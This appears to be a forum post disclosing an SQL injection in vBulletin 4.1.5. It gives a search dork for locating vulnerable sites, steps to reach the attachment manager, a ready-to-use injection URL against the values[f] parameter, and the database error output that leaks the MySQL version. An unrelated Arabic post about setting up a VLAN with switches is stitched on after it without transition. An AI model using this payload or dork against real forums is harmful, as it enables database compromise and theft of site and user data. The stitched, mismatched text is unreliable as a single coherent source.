While examining request variables I came across an SQL injection, which later turned out to be present in every vBulletin 4.1.5 installation. Title: Vulnerability in vBulletin 4.1.5. Dork: Powered by Powered by vBulletin 4.1.5. Conditions: an account on the forum and permission to attach files to messages / themes (attachments). Register -> go to the forum -> open a topic or, if the board allows it, choose to create an article (the second option takes more work) -> at the bottom find Attachments, 'Manage Attachments' -> open the window and insert the SQL query into the "values[f]" parameter. The error output below shows the cause: the value of values[f] is placed unquoted into the "nodeid =" comparison of the CMS node query, so any value that is not a plain integer changes the statement. Example:
Code:
http://site.com/board/newattachment.php?do=assetmanager&values[f]=-1599+or(1,2)=(select*from(select+name_const(version(),1),name_const(version(),1))a)&contenttypeid=18&poststarttime=1360663633&posthash=4f5c850593e10c5450d9e880d58a56d8&insertinline=1
After that, the forum shows its standard database-error page; open the page source and you will see:

Code:
<! -
Database error in vBulletin 4.1.5 :
Invalid SQL :
             SELECT
                 permissionsfrom ,  Hidden ,  setpublish ,  publishdate ,  userid
             FROM ds23fSDdfsdf_cms_node
             WHERE
                 nodeid  = - 1599  or ( 1 , 2 ) = ( Select * from ( Select name_const ( version () , 1 ), name_const ( version (), 1 )) a );
MySQL Error    :  Duplicate column Name  .1.49-3 '5 '
Error Number   :  1060
Request Date   :  Tuesday ,  February 12th  2013   @  01 : 12 : 33 PM
Error Date     :  Tuesday ,  February 12th  2013   @  01 : 12 : 33

Address     :  127.0.0.1
Username       :  Hacker
Classname      :  vB_Database
MySQL Version  :  
->

الأربعاء، 23 مايو 2012

شرح إنشاء شبكة VLAN مبسطة بدون راوتر ولا VTP باستخدام سويتشات فقط


السلام عليكم ورحمة الله وبركاته




الموضوع بخص بالشبكات واخص بها شهادة سيسكو

وهو انشاء vlan شبكه مبسطه وشرح بسيط وان شاء الله يكون مفيد

الشرح فيديو ورفعته على قناتي سامحوني يمكن الصوت بسيط |.. او فيه تشوويش

وهو خاص لبيت الهكر و مدونتي الخاصه بعلم الشبكات وهي

[URL="http://n1x.blogspot.com/"]هنا[/URL]


الشرح هنا، والأوامر سأنزلها بصيغة Doc في آخر الموضوع
[url]http://www.youtube.com/watch?v=vO6gU-8I3oc[/url]

اذا كان في خطا مني واتمنى تعذروني .. وان اصبت فـ من الله عز  جل



[url]http://www.2shared.com/document/PbbI2ZA9/___VLANs_Router__VTP.html[/url]